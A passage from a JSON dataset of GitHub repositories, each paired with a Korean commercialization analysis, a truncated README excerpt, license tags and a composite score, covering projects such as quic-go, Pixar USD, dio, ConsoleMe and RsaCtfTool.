어디에 쓸 수 있나\n\n**1. 동영상 스트리밍 서비스(넷플릭스, 유튜브 같은 SaaS)**\n- 버퍼링 없이 고화질 영상을 더 ","readme_excerpt":"<div align=\"center\" style=\"margin-bottom: 15px;\">\n  <img src=\"./assets/quic-go-logo.png\" width=\"700\" height=\"auto\">\n</div>\n\n# A QUIC implementation in pure Go\n\n\n[![Documentation](https://img.shields.io/badge/docs-quic--go.net-red?style=flat)](https://quic-go.net/docs/)\n[![PkgGoDev](https://pkg.go.dev/badge/github.com/quic-go/quic-go)](https://pkg.go.dev/github.com/quic-go/quic-go)\n[![Code Coverage](https://img.shields.io/codecov/c/github/quic-go/quic-go/master.svg?style=flat-square)](https://codecov.io/gh/quic-go/quic-go/)\n[![Fuzzing Status](https://oss-fuzz-build-logs.storage.googleapis.com/badges/quic-go.svg)](https://issues.oss-fuzz.com/issues?q=quic-go)\n\nquic-go is an implementation of the QUIC protocol ([RFC 9000](https://datatracker.ietf.org/doc/html/rfc9000), [RFC 9001](https://datatracker.ietf.org/doc/html/rfc9001), [RFC 9002](https://datatracker.ietf.org/doc/html/rfc9002)) in Go. It has support for HTTP/3 ([RFC 9114](https://datatracker.ietf.org/doc/html/rfc9114)), including Q","composite_score":0.0626,"license_safety_tag":"safe"},{"name":"PixarAnimationStudios/USD","github_url":"https://github.com/PixarAnimationStudios/USD","stars":6,"language":"C++","license":"NOASSERTION","abandonment_months":1,"description":"# USD (Universal Scene Description) 저장소 분석\n\n## 왜 보물인가\n픽사가 개발한 3D 영상 제작의 국제 표준 기술로, 영화·게임·메타버스 산업 전체에서 필수적인 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **3D 협업 플랫폼 SaaS**: 건축·영상 제작팀이 클라우드에서 실시간으로 3D 장면을 함께 편집하는 서비스\n2. *","readme_excerpt":"Universal Scene Description\n===========================\n\nUniversal Scene Description (USD) is an efficient, scalable system for\nauthoring, reading, and streaming time-sampled scene description for\ninterchange between graphics applications.\n\nFor more details, please visit the web site [here](http://openusd.org).\n\nBuild Status\n------------\n\n|         |   Status   |\n|:-------:|:---------:|\n|   dev   | [![BuildUSD](https://github.com/PixarAnimationStudios/OpenUSD/actions/workflows/buildusd.yml/badge.svg?branch=dev)](https://github.com/PixarAnimationStudios/OpenUSD/actions/workflows/buildusd.yml) |\n|  release | [![BuildUSD](https://github.com/PixarAnimationStudios/OpenUSD/actions/workflows/buildusd.yml/badge.svg?branch=release)](https://github.com/PixarAnimationStudios/OpenUSD/actions/workflows/buildusd.yml) |\n\nAdditional Documentation\n------------------------\n\n* [User Documentation and Tutorials](http://openusd.org/docs/index.html)\n* [API Documentation](http://openusd.org/docs/api/index.ht","composite_score":0.0625,"license_safety_tag":"unknown"},{"name":"rengwuxian/MaterialEditText","github_url":"https://github.com/rengwuxian/MaterialEditText","stars":5,"language":"Java","license":"unknown","abandonment_months":2,"description":"# MaterialEditText 상업화 분석\n\n## 왜 보물인가\n스마트폰 앱에서 사용자가 글을 입력하는 박스를 더 예쁘고 사용하기 편하게 만드는 기술입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 모바일 앱 개발 플랫폼(SaaS)**\n- 앱 만드는 사람들이 쉽게 가져다 쓸 수 있는 입력 창 디자인 라이브러리로 판매\n- 월간 구독으로 지속적 수익 창출\n\n**","readme_excerpt":"MaterialEditText\n================\n\n# ⚠️ No Longer Maintained\n\n⚠️ This repository is no longer maintained as I have moved on to Kotlin and Jetpack Compose for Android development.\n\n🙏🏻 Thank you for your interest and contributions!\n\n⛔ Issues and pull requests are no longer actively reviewed.\n\n[![Android Arsenal](https://img.shields.io/badge/Android%20Arsenal-MaterialEditText-brightgreen.svg?style=flat)](https://android-arsenal.com/details/1/1085)\n\n> ## NOTE: 2.0 is NOT BACKWARDS COMPATIBLE! See more on [wiki](https://github.com/rengwuxian/MaterialEditText/wiki) or [中文看这里](http://www.rengwuxian.com/post/materialedittext)\n\n\n![MaterialEditText](./images/material_edittext.png)\n\nAppCompat v21 makes it easy to use Material Design EditText in our apps, but it's so limited. If you've tried that, you know what I mean. So I wrote MaterialEditText, the EditText in Material Design, with more features that [Google Material Design Spec](http://www.google.com/design/spec/components/text-fields.html) ha","composite_score":0.0624,"license_safety_tag":"unknown"},{"name":"cdle/sillyGirl","github_url":"https://github.com/cdle/sillyGirl","stars":9,"language":"","license":"unknown","abandonment_months":2,"description":"# sillyGirl 저장소 분석\n\n## 왜 보물인가\n이 프로젝트는 작은 규모이지만 반복적인 업무를 자동으로 처리해주는 도구로, 수작업으로 처리하던 일들을 프로그램이 대신할 수 있게 만들어줍니다.\n\n## 어디에 쓸 수 있나\n- **소상공인 자동화 도구**: 온라인 쇼핑몰 주인이 주문 확인, 재고 관리를 자동으로 처리하는 SaaS 서비스\n- **회사 내부 업","readme_excerpt":"<h1 align=\"center\">傻妞</h1>\n<div align=\"center\">\n<font size=3> 支持多种开发语言的机器人框架，一个脚本即可实现跨平台的用户交互.</font>\n\n<font size=4>一个不太有用的机器人，我愿称之为 **《废物》**.</font>\n\n[开发文档](https://cdle.github.io/sillyGirl) | [Github](https://github.com/cdle/sillyGirl) | [TG 频道](https://t.me/kczz2021) | [赞助列表](./sponsors.md)\n\n\\_\n\n</div>\n\n> **傻妞 是一个开箱即用的 社交平台交互 框架。它基于 OOP 函数响应式编程，具有占用小、响应快、开发易等特点，允许开发者创建高度可测试、可扩展、松散耦合且易于维护的应用程序**\n\n# 特性\n\n- 多平台多账户接入系统 ： 2 个 qq/3 个 wx/4 个 tg? so easy!；\n  - 用户可以前往插件市场，一键安装自己想要接入聊天工具，简单配置即可使用\n    ![开箱即用的适配器](md/image/use/adapters.png)\n  - 开发者可以通过 Adapter 自由接入聊天工具，以下是接入`tailchat`的简单插件例子\n\n```javascript\n/**\n * @title Tailchat\n * @create_at 2023-08-05 21:16:32\n * @description 🐒配置详见 https://tailchat.msgbyte.com/zh-Hans/docs/advanced-usage/openapp/ws\n * @author 猫咪\n * @version v1.0.3\n * @form {key: \"tailchat.APPID\", title: \"APP ID\", required: true }\n * @form {key: \"tailchat.APPSECRET\", title: \"APP SECRET\", required: true }\n * @form {key: \"tailchat.HOST\", title: \"HOST\", required: true, tooltip: \"服","composite_score":0.0624,"license_safety_tag":"unknown"},{"name":"ashishb/android-security-awesome","github_url":"https://github.com/ashishb/android-security-awesome","stars":7,"language":"Makefile","license":"apache-2.0","abandonment_months":0,"description":"# android-security-awesome 분석\n\n## 왜 보물인가\n안드로이드 휴대폰의 보안 취약점을 찾고 관리하기 위한 모든 도구와 자료를 한곳에 모은 참고서입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업 IT팀이 직원 휴대폰 보안을 점검하는 클라우드 진단 플랫폼\n2. **내부 업무 도구**: 앱 개발사가 자사 제품의 보안 문","readme_excerpt":"# android-security-awesome ![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)\n\n[![Link Liveness Checker](https://github.com/ashishb/android-security-awesome/actions/workflows/validate-links.yml/badge.svg)](https://github.com/ashishb/android-security-awesome/actions/workflows/validate-links.yml)\n\n[![Lint Shell scripts](https://github.com/ashishb/android-security-awesome/actions/workflows/lint-shell-script.yaml/badge.svg)](https://github.com/ashishb/android-security-awesome/actions/workflows/lint-shell-script.yaml)\n[![Lint Markdown](https://github.com/ashishb/android-security-awesome/actions/workflows/lint-markdown.yaml/badge.svg)](https://github.com/ashishb/android-security-awesome/actions/workflows/lint-markdown.yaml)\n[![Lint YAML](https://github.com/ashishb/android-security-awesome/actions/workflows/lint-yaml.yaml/badge.svg)](https://github.com/ashishb/android-security-awesome/actions/workflows/lint-yaml.yaml)\n[![Lint GitHu","composite_score":0.0623,"license_safety_tag":"safe"},{"name":"flutterchina/dio","github_url":"https://github.com/flutterchina/dio","stars":5,"language":"Dart","license":"MIT","abandonment_months":0,"description":"# Dio 저장소 분석\n\n## 왜 보물인가\n모바일 앱 개발자들이 서버와 통신할 때 필요한 핵심 도구로, 사용 난이도를 크게 낮춘 솔루션입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 모바일 앱 기반 구독 서비스(배달앱, 금융앱)의 백엔드 통신 기능 제공\n2. **내부 업무 도구**: 기업 직원용 모바일 앱에서 사내 시스템과 데이터를 주고","readme_excerpt":"# dio\n\nLanguage: English | [简体中文](README-ZH.md)\n\nThis is the base repo of the **dio** project.\nPlease move specific paths for project instructions.\n\n> Don't forget to add [#dio](https://pub.dev/packages?q=topic%3Adio)\n> topic to your published dio related packages!\n> See more: https://dart.dev/tools/pub/pubspec#topics\n\n## Versioning\n\n**Before you upgrade: Breaking changes might happen in major and minor versions of packages.<br/>\nSee the [Migration Guide][] for the complete breaking changes list.**\n\nTo know about our compatibility policy, see the [Compatibility Policy][] doc.\n\n[Migration Guide]: https://pub.dev/documentation/dio/latest/topics/Migration%20Guide-topic.html\n[Compatibility Policy]: COMPATIBILITY_POLICY.md\n\n## All Packages\n\n### dio\n\n- dio: [link](dio)\n  [![Pub](https://img.shields.io/pub/v/dio.svg?label=dev&include_prereleases)](https://pub.dev/packages/dio)\n\n### Plugins\n\n- cookie_manager: [link](plugins/cookie_manager)\n  [![Pub](https://img.shields.io/pub/v/dio_cookie_mana","composite_score":0.0623,"license_safety_tag":"safe"},{"name":"pfnet/intern-coding-tasks","github_url":"https://github.com/pfnet/intern-coding-tasks","stars":6,"language":"HTML","license":"unknown","abandonment_months":5,"description":"# pfnet/intern-coding-tasks 분석\n\n## 왜 보물인가\n신입 개발자 교육과 회사 인턴십 프로그램을 체계적으로 관리할 수 있는 실무 중심의 과제 관리 시스템입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 IT 회사들이 구독하는 인턴십 관리 플랫폼 (과제 배분, 평가, 포트폴리오 추적)\n2. **내부 업무 도구**: ","readme_excerpt":"# PFN Internship Coding Tasks\n\n<img src=\"logo.png\" width=\"500\">\n\nThis repository contains coding problems used for the screening process in PFN (Preferred Networks) summer internship.\n\nEnglish and Japanese statements are available. The overview of the problems is as follows.\n\n## 2021-2025\nThe problems in 2021-2025 consist of \"coding task\" and \"thematic task\".\n\n## 2020\nThe problem in 2020 consists of \"coding task\" and \"survey task\".\n\n## 2019\nThe problem set in 2019 consists of six themes. Each applicant needed to choose one of them according to the theme they have chosen.\n\n- Machine Learning\n- Back-end\n- Front-end\n- Chip\n- Performance Optimization\n- Computer Vision (Chainer)\n\n\n## 2018\nThe problem set in 2018 consists of five themes.\n\n- **Machine Learning/Mathematics**: You are asked to implement an algorithm of adversarial examples for some neural network model. You need to write a simple report on the performance of the algorithm as well.\n- **Back-end**: You are asked to create a tool ","composite_score":0.0623,"license_safety_tag":"unknown"},{"name":"facebook/yoga","github_url":"https://github.com/facebook/yoga","stars":6,"language":"C++","license":"mit","abandonment_months":0,"description":"# Facebook Yoga 저장소 분석\n\n## 왜 보물인가\nFacebook에서 만든 레이아웃 엔진으로, 모바일 앱이나 웹사이트의 화면 배치를 자동으로 정렬해주는 기술입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 웹 디자인 도구나 앱 개발 플랫폼에 통합하여 사용자가 쉽게 화면을 구성할 수 있도록 제공\n- **내부 업무 도구**: 기업의 데","readme_excerpt":"# Yoga [![npm](https://img.shields.io/npm/v/yoga-layout.svg)](https://www.npmjs.com/package/yoga-layout) [![Maven Central](https://img.shields.io/maven-central/v/com.facebook.yoga/yoga)](https://search.maven.org/artifact/com.facebook.yoga/yoga) ![SPM](https://img.shields.io/badge/SPM-Supported-blue.svg)\n\nYoga is an embeddable and performant flexbox layout engine with bindings for multiple languages.\n\n## Building\n\nYoga's main implementation targets C++ 20 with accompanying build logic in CMake. A wrapper is provided to build the main library and run unit tests.\n\n```sh\n./unit_tests <Debug|Release>\n```\n\nWhile not required, this script will use [ninja](https://ninja-build.org/) if it is installed for faster builds.\n\nYoga is additionally part of the [vcpkg](https://github.com/Microsoft/vcpkg/) collection of ports maintained by Microsoft and community contributors. If the version is out of date, please [create an issue or pull request](https://github.com/Microsoft/vcpkg) on the vcpkg reposit","composite_score":0.0623,"license_safety_tag":"safe"},{"name":"Hagb/docker-easyconnect","github_url":"https://github.com/Hagb/docker-easyconnect","stars":5,"language":"Shell","license":"WTFPL","abandonment_months":3,"description":"# docker-easyconnect 분석\n\n## 왜 보물인가\n복잡한 VPN 연결 프로그램을 간단한 컨테이너 방식으로 실행할 수 있어, 회사 네트워크 접속이 필요한 사람들의 설치 번거로움을 획기적으로 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **원격근무 솔루션 SaaS**: 직원들이 어디서나 회사 시스템에 안전하게 접속할 수 있게 하는 월간 구","readme_excerpt":"# docker-easyconnect\n\n让深信服开发的**非自由**的 VPN 软件 EasyConnect 或 aTrust 运行在 docker 中，提供 [socks5 和 http 代理](doc/usage.md#代理服务)服务和[网关](doc/usage.md#ip-forward)供宿主机连接使用。\n\n本项目基于 EasyConnect 官方“Linux”版的 deb 包、[@shmille](https://github.com/shmilee) 提供的[命令行版客户端 deb 包](https://github.com/shmilee/scripts/releases/download/v0.0.1/easyconn_7.6.8.2-ubuntu_amd64.deb)、aTrust 官方“Linux”版 deb 包，这些 deb 包的版权归深信服（Sangfor）所有，请不要滥用本项目。本项目**不是**深信服官方项目。\n\n**招募项目维护者，有兴趣可在 [#275](https://github.com/docker-easyconnect/docker-easyconnect/issues/275) 下回复。**\n\n欢迎批评、指正，提交 issue、PR，包括但不仅限于 bug、各种疑问、代码和文档的改进。\n\n详细用法见于 [doc/usage.md](doc/usage.md)，常见问题见于 [doc/faq.md](doc/faq.md)，自行构建可参照构建说明 [doc/build.md](doc/build.md)。\n\n## 简明使用步骤\n\n使用下述方式登录后，可以通过 `127.0.0.1:1080`、`127.0.0.1:8888` 分别访问 [socks5 和 http 代理](doc/usage.md#代理服务)。\n\n### 纯命令行版 EasyConnect（amd64 架构）\n\n注意，纯命令行版本仅支持下列登录方式：用户名+密码、硬件特征码。\n\n1. [安装Docker并运行](https://docs.docker.com/get-docker/)；\n2.  在终端输入：\n\t``` bash\n\tdocker run --rm --device /dev/net/tun --cap-add NET_ADMIN -ti ","composite_score":0.0622,"license_safety_tag":"safe"},{"name":"baomidou/dynamic-datasource-spring-boot-starter","github_url":"https://github.com/baomidou/dynamic-datasource-spring-boot-starter","stars":5,"language":"Java","license":"Apache-2.0","abandonment_months":1,"description":"# dynamic-datasource-spring-boot-starter 사업화 분석\n\n## 왜 보물인가\n여러 데이터베이스를 하나의 애플리케이션에서 쉽게 관리할 수 있게 해주는 도구로, 대규모 데이터를 다루는 기업들이 매우 필요로 하는 기술입니다.\n\n## 어디에 팔 수 있나\n1. **다중 고객사 SaaS**: 각 고객마다 별도의 데이터베이스를 관리해야 하는","readme_excerpt":"<p align=\"center\">\n<img src=\"https://images.gitee.com/uploads/images/2019/0626/231046_f44892b9_709883.png\" border=\"0\" />\n\n</p>\n\n<p align=\"center\">\n\t<strong>一个基于springboot的快速集成多数据源的启动器</strong>\n</p>\n\n<p align=\"center\">\n   <a>\n        <img src=\"https://badgen.net/github/stars/baomidou/dynamic-datasource-spring-boot-starter\" >\n    </a>\n    <a href=\"https://mvnrepository.com/artifact/com.baomidou/dynamic-datasource-spring-boot-starter\" target=\"_blank\">\n        <img src=\"https://img.shields.io/maven-central/v/com.baomidou/dynamic-datasource-spring-boot-starter.svg\" >\n    </a>\n    <a href=\"https://www.apache.org/licenses/LICENSE-2.0.html\" target=\"_blank\">\n        <img src=\"https://img.shields.io/:license-apache-brightgreen.svg\" >\n    </a>\n    <a>\n        <img src=\"https://img.shields.io/badge/JDK-8+-green.svg\" >\n    </a>\n    <a>\n        <img src=\"https://img.shields.io/badge/springBoot-1.5.x__2.x.x__3.x.x__4.x.x-green.svg\" >\n    </a>\n    <a href=\"https://www.jetbrains.com\">\n        <img src=","composite_score":0.0622,"license_safety_tag":"safe"},{"name":"Netflix/consoleme","github_url":"https://github.com/Netflix/consoleme","stars":8,"language":"Python","license":"Apache-2.0","abandonment_months":3,"description":"# Netflix ConsoleMe 분석\n\n## 왜 보물인가\nNetflix가 만든 기업용 권한 관리 도구로, 복잡한 접근 권한을 간단하게 관리할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 기업 고객들의 클라우드 접근 권한을 자동으로 관리해주는 보안 서비스로 제공\n2. **내부 업무 도구**: 대규모 IT 팀이 수천 개의 ","readme_excerpt":"# 🚨 Notice: ConsoleMe & Weep Are Being Archived 🚨 #\nThis repository will be archived and set to read-only on March 1, 2026. After this date, no further changes, issues, or pull requests will be accepted. The Discord server will also be deleted.\n\n## 🙏 Thank You ##\nSince open-sourcing ConsoleMe and Weep in March 2021, the projects have grown into a widely adopted AWS IAM management solution (now with 3,200+ GitHub stars). We’re grateful to everyone—inside and outside Netflix—who has contributed code, feedback, documentation, and ideas over the years. Your support has been critical to the success of this ecosystem.\n\n## ❓ Why Are We Archiving? ##\nOver time, the internal versions of ConsoleMe and Weep at Netflix have evolved significantly, especially following a major refactor last year. As a result, the open-source versions now diverge substantially from our internal implementations and no longer reflect how we use or operate these tools.\n\nAt the same time, due to ongoing bandwidth and res","composite_score":0.0622,"license_safety_tag":"safe"},{"name":"luin/ioredis","github_url":"https://github.com/luin/ioredis","stars":6,"language":"TypeScript","license":"mit","abandonment_months":1,"description":"# ioredis 저장소 분석\n\n## 왜 보물인가\n빠른 데이터 저장소(Redis)를 쉽게 연결할 수 있는 도구로, 웹 서비스의 속도를 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **실시간 채팅 SaaS**: 메시지를 빠르게 저장하고 전달하는 채팅 플랫폼의 핵심 기술\n2. **전자상거래 캐시 시스템**: 쇼핑몰의 상품 정보와 재고를 빠르게 조회","readme_excerpt":"[![ioredis](https://cdn.jsdelivr.net/gh/redis/ioredis@b5e8c74/logo.svg)](https://github.com/redis/ioredis)\n\n[![Build Status](https://github.com/redis/ioredis/actions/workflows/release.yml/badge.svg?branch=main)](https://github.com/redis/ioredis/actions/workflows/release.yml?query=branch%3Amain)\n[![Coverage Status](https://coveralls.io/repos/github/luin/ioredis/badge.svg?branch=main)](https://coveralls.io/github/luin/ioredis?branch=main)\n[![Commitizen friendly](https://img.shields.io/badge/commitizen-friendly-brightgreen.svg)](http://commitizen.github.io/cz-cli/)\n[![semantic-release](https://img.shields.io/badge/%20%20%F0%9F%93%A6%F0%9F%9A%80-semantic--release-e10079.svg)](https://github.com/semantic-release/semantic-release)\n\n[![Discord](https://img.shields.io/discord/697882427875393627.svg?style=social&logo=discord)](https://discord.gg/redis)\n[![Twitch](https://img.shields.io/twitch/status/redisinc?style=social)](https://www.twitch.tv/redisinc)\n[![YouTube](https://img.shields.io/youtu","composite_score":0.0621,"license_safety_tag":"safe"},{"name":"tijsverkoyen/CssToInlineStyles","github_url":"https://github.com/tijsverkoyen/CssToInlineStyles","stars":5,"language":"PHP","license":"bsd-3-clause","abandonment_months":5,"description":"# CssToInlineStyles 상용화 분석\n\n## 왜 보물인가\n이메일이나 웹 문서에서 디자인을 제대로 표현하기 위해 필요한 스타일 변환 기술로, 많은 온라인 서비스들이 숨어서 사용하고 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **이메일 마케팅 자동화 SaaS**: 사용자가 만든 이메일 템플릿을 자동으로 변환하여 모든 이메일 클라이언트에서 정확히 표","readme_excerpt":"# CssToInlineStyles class\n\n[![CI](https://github.com/tijsverkoyen/CssToInlineStyles/actions/workflows/ci.yml/badge.svg)](https://github.com/tijsverkoyen/CssToInlineStyles/actions/workflows/ci.yml)\n\n## About\n\nCssToInlineStyles is a class that enables you to convert HTML-pages/files into\nHTML-pages/files with inline styles. This is very useful when you're sending\nemails.\n\n## Installation\n\nThe recommended installation way is through [Composer](https://getcomposer.org).\n\n```bash\n$ composer require tijsverkoyen/css-to-inline-styles\n```\n\n## Example\n\n```php\nuse TijsVerkoyen\\CssToInlineStyles\\CssToInlineStyles;\n\n// create instance\n$cssToInlineStyles = new CssToInlineStyles();\n\n$html = file_get_contents(__DIR__ . '/examples/sumo/index.htm');\n$css = file_get_contents(__DIR__ . '/examples/sumo/style.css');\n\n// output\necho $cssToInlineStyles->convert(\n    $html,\n    $css\n);\n```\n\n## Known issues\n\n* no support for pseudo selectors\n* no support for [css-escapes](https://mathiasbynens.be/notes/css-esc","composite_score":0.0621,"license_safety_tag":"safe"},{"name":"MintCN/linux-insides-zh","github_url":"https://github.com/MintCN/linux-insides-zh","stars":5,"language":"Python","license":"NOASSERTION","abandonment_months":1,"description":"# MintCN/linux-insides-zh 평가 보고서\n\n## 왜 보물인가\n리눅스 운영체제의 내부 동작 원리를 누구나 이해할 수 있도록 중국어로 설명한 교육 자료로, 컴퓨터 시스템을 깊이 있게 배우고 싶은 사람들의 학습 수요를 충족합니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼(SaaS)**: 프로그래밍 학원이나 개발자 교육 사이트에서 ","readme_excerpt":"# Linux 内核揭秘\n\n本仓库包含一本关于 Linux 内核及其内在机理的在编书籍，是 [linux-insides](https://github.com/0xAX/linux-insides) 的中文翻译版本。\n\n**目的很简单** - 分享 Linux 内核内部原理及相关底层主题的知识。如果你想了解 Linux 内核的底层运作，请查阅[目录](https://github.com/hust-open-atom-club/linux-insides-zh/blob/master/SUMMARY.md)。\n\n**问题/建议**: 如有相关问题或建议，请提交 issue。一方面，对于英文原文问题，请在上游仓库 - [linux-insides](https://github.com/0xAX/linux-insides) 中提交 issue；另一方面，对于中文翻译问题，请在下游仓库 - [linux-insides-zh](https://github.com/hust-open-atom-club/linux-insides-zh) 中提交 issue。\n\n## 前置要求\n\n- 熟悉[汇编语言](https://zh.wikipedia.org/wiki/%E6%B1%87%E7%BC%96%E8%AF%AD%E8%A8%80)\n- 熟练掌握 [C 语言](https://zh.wikipedia.org/wiki/C%E8%AF%AD%E8%A8%80)\n- 此外，[Intel 软件开发者手册](https://www.intel.com/content/www/us/en/developer/articles/technical/intel-sdm.html)中有大量关于 x86_64 处理器的参考资料\n\n## 贡献\n\n如有相关问题或建议，请不吝指教，提交 issues 或者 PRs。对于 `linux-insides-zh` 翻译项目，请通过以下方法进行贡献：\n\n- 将英文原文翻译为中文（目前只提供简体中文的译文）；\n- 同步尚未翻译的英文原文至本项目；\n- 根据上游英文的更新，检查并更新已有的中文译文；\n- 校对已翻译的中文译文，包括修正错别字、润色等；\n\n目前本项目的**翻译进度**与**翻译认领规则**，请查看 [TRANSLATION_STATU","composite_score":0.0621,"license_safety_tag":"unknown"},{"name":"goatfungus/NMSSaveEditor","github_url":"https://github.com/goatfungus/NMSSaveEditor","stars":6,"language":"","license":"unknown","abandonment_months":3,"description":"# NMSSaveEditor 상용화 분석\n\n## 왜 보물인가\n'노맨스카이' 게임의 저장 파일을 직접 편집할 수 있는 도구로, 게이머들이 게임 진행 상황을 자유롭게 조정하고 싶어 하는 수요를 충족시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **게임 편의 도구 SaaS**: 웹 기반 저장 파일 편집 서비스로 제공하여 구독료 수익화\n2. **게임 커뮤니티","readme_excerpt":"# No Man's Sky - Save Editor (for WORLDS)\n\n## Introduction\n\nSince No Man's Sky first came out, there have been many notable game-breaking bugs as well as many parts of the game that seemed too grindy and not much fun. Some of the bugs had workarounds or later patches to fix them, but others simply stopped your progress. Either way, I just want to enjoy the game!\n\nAfter many tedious searches trying to find a solution, I came across a save editor that allowed me to make a change to the save file, but it was very limited in what it could do, and unless you were very careful you could screw up your save file completely. So I decided to rewrite it in Java for fun, with a simpler user interface, and as I dug deeper and added more functionality I decided to release it publicly. It has grown to become a pretty useful tool.\n\n### Features\n\n- Easy to use UI.\n  - Ability to customise Look & Feel (Light / Dark modes, inventory scaling)\n- Change data values:\n  - Currencies (Units, Nanites and Quicks","composite_score":0.0618,"license_safety_tag":"unknown"},{"name":"hoshsadiq/adblock-nocoin-list","github_url":"https://github.com/hoshsadiq/adblock-nocoin-list","stars":6,"language":"Adblock Filter List","license":"mit","abandonment_months":5,"description":"# adblock-nocoin-list 분석\n\n## 왜 보물인가\n당신의 인터넷을 몰래 느리게 만드는 채굴 프로그램을 자동으로 차단하는 필터 목록입니다.\n\n## 어디에 쓸 수 있나\n1. **광고 차단 앱 회사**: 이 필터를 자신들의 앱에 추가하여 사용자 경험을 향상시킬 수 있습니다.\n2. **인터넷 서비스 제공업체(ISP)**: 네트워크 단계에서 채굴 프로","readme_excerpt":"# NoCoin adblock list\nThis is an adblock list to block \"browser-based crypto mining\". Currently there are a few websites added into the lists. If you see other websites supporting these deeds, then feel free to raise an **Issue** or **Pull request** for it to be taken care of.\n\n## Installation\n\n### AdBlock Filter\nMake sure you have an adblocker installed in your desktop or mobile browsers that uses [Adblock Plus](https://adblockplus.org/)' filter list:\n* ![AdBlock](https://i.imgur.com/3KbyifF.png) [AdBlock](https://getadblock.com) (Active by default)\n* ![AdBlock Plus](https://i.imgur.com/kPRCfhu.png) [Adblock Plus](https://adblockplus.org/)\n* ![uBock Origin](https://i.imgur.com/PSFuzKb.png) [uBlock Origin](https://github.com/gorhill/uBlock)\n* ![AdGuard Browser Extension](https://i.imgur.com/zmMHq2j.png) [AdGuard Browser Extension](https://adguard.com/en/adguard-browser-extension/overview.html) (Included by default)\n* ![AdBlock Browser](https://i.imgur.com/6pkmjA0.png) [Adblock Browser]","composite_score":0.0618,"license_safety_tag":"safe"},{"name":"GigaMick/burnernote","github_url":"https://github.com/GigaMick/burnernote","stars":19,"language":"Blade","license":"GPL-3.0","abandonment_months":3,"description":"# Burnernote 상용화 분석\n\n## 왜 보물인가\n임시 메모를 안전하게 작성했다가 자동으로 삭제되는 서비스로, 민감한 정보를 다루는 사람들이 프라이버시 걱정 없이 빠르게 기록할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 의료진·변호사·기자 등이 환자·의뢰인·취재원 정보를 임시로 정리했다가 자동 삭제하는 '안전한 메모 서비스'","readme_excerpt":"## Burnernote App\n\n**[Burnernote](https://burnernote.com)** Send secure and encrypted notes that self destruct once they've been read. It is designed to be:\n\n* **Ad Free and simple.** No clutter, no bloat, no complex dependencies. Burnernote is built with PHP so it’s quick and easy to deploy.\n\n* **Open-source and Beautiful.** [Burnernote](https://github.com/Gigamick/burnernote) is open source and available on github.\n\n* **Set password.** Set an optional password for the self-destructing messages.\n\n* **Auto self destruct.** The note will expire after a set number of days, **default to 7 days**\n\n* **Burn Box.** Registered users get a public inbox URL where anyone can send them encrypted notes. [Learn more](docs/BURN-BOX.md)\n\n\n### :zap: Installation using [laravel\\valet](https://laravel.com/docs/10.x/valet)\n\n- Clone the repository.\n```bash\ngit clone https://github.com/Gigamick/burnernote.git\n```\n\n- Change current working directory\n```bash\ncd burnernote\n```\n\n- Make sure `php is ^8.0`\n```ba","composite_score":0.0618,"license_safety_tag":"restricted"},{"name":"fossasia/fossasia.org","github_url":"https://github.com/fossasia/fossasia.org","stars":11,"language":"Less","license":"unknown","abandonment_months":3,"description":"# fossasia/fossasia.org 분석\n\n## 왜 보물인가\nFOSS Asia는 아시아 최대 규모의 오픈소스 커뮤니티 플랫폼으로, 개발자들이 무료로 소프트웨어를 공유하고 협업하는 중심지입니다.\n\n## 어디에 쓸 수 있나\n1. **커뮤니티 관리 SaaS**: 오픈소스 프로젝트들을 한 곳에 모으고 개발자들의 협업을 돕는 구독형 플랫폼\n2. **기업 내부","readme_excerpt":"# FOSSASIA.org\n\n[![Build Status](https://travis-ci.org/fossasia/fossasia.org.svg?branch=gh-pages)](https://travis-ci.org/fossasia/fossasia.org) [![Join the chat at https://gitter.im/fossasia/fossasia](https://badges.gitter.im/fossasia/fossasia.svg)](https://gitter.im/fossasia/fossasia?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n[![Mailing List](https://img.shields.io/badge/Mailing%20List-FOSSASIA-blue.svg)](mailto:fossasia@googlegroups.com)\n\nFOSSASIA develops Open Source software and hardware solutions with a global developer community from its base in Asia and organizes Open Technology events around the year. The mission of FOSSASIA is to improve people's lives by sharing open technologies, knowledge and resources to help build a sustainable FOSS ecosystem. \n\nThe organization supports its successful projects as a business incubator and runs coding programs and development contests like [Codeheat](https://codeheat.org) to grow the developer community. \n\nF","composite_score":0.0617,"license_safety_tag":"unknown"},{"name":"Ganapati/RsaCtfTool","github_url":"https://github.com/Ganapati/RsaCtfTool","stars":9,"language":"Python","license":"MIT","abandonment_months":0,"description":"# RsaCtfTool 상용화 분석\n\n## 왜 보물인가\n암호화된 정보를 풀어야 하는 보안 전문가들이 복잡한 수학 계산을 자동으로 처리할 수 있게 해주는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **보안 교육 SaaS**: 대학교와 온라인 강의 플랫폼에 \"암호 해독 실습\" 서비스로 월 구독료를 받으며 제공\n2. **기업 보안 감시 API**: 기업의 보","readme_excerpt":"# RsaCtfTool\n\n<div align=\"center\">\n\n[![Test](https://github.com/RsaCtfTool/RsaCtfTool/actions/workflows/test.yml/badge.svg)](https://github.com/RsaCtfTool/RsaCtfTool/actions/workflows/test.yml)\n[![Ruff](https://github.com/RsaCtfTool/RsaCtfTool/actions/workflows/lint_python.yml/badge.svg)](https://github.com/RsaCtfTool/RsaCtfTool/actions/workflows/lint_python.yml)\n[![CodeQL](https://github.com/RsaCtfTool/RsaCtfTool/workflows/CodeQL/badge.svg)](https://github.com/RsaCtfTool/RsaCtfTool/actions/workflows/CodeQL)\n<br>\n[![GitHub 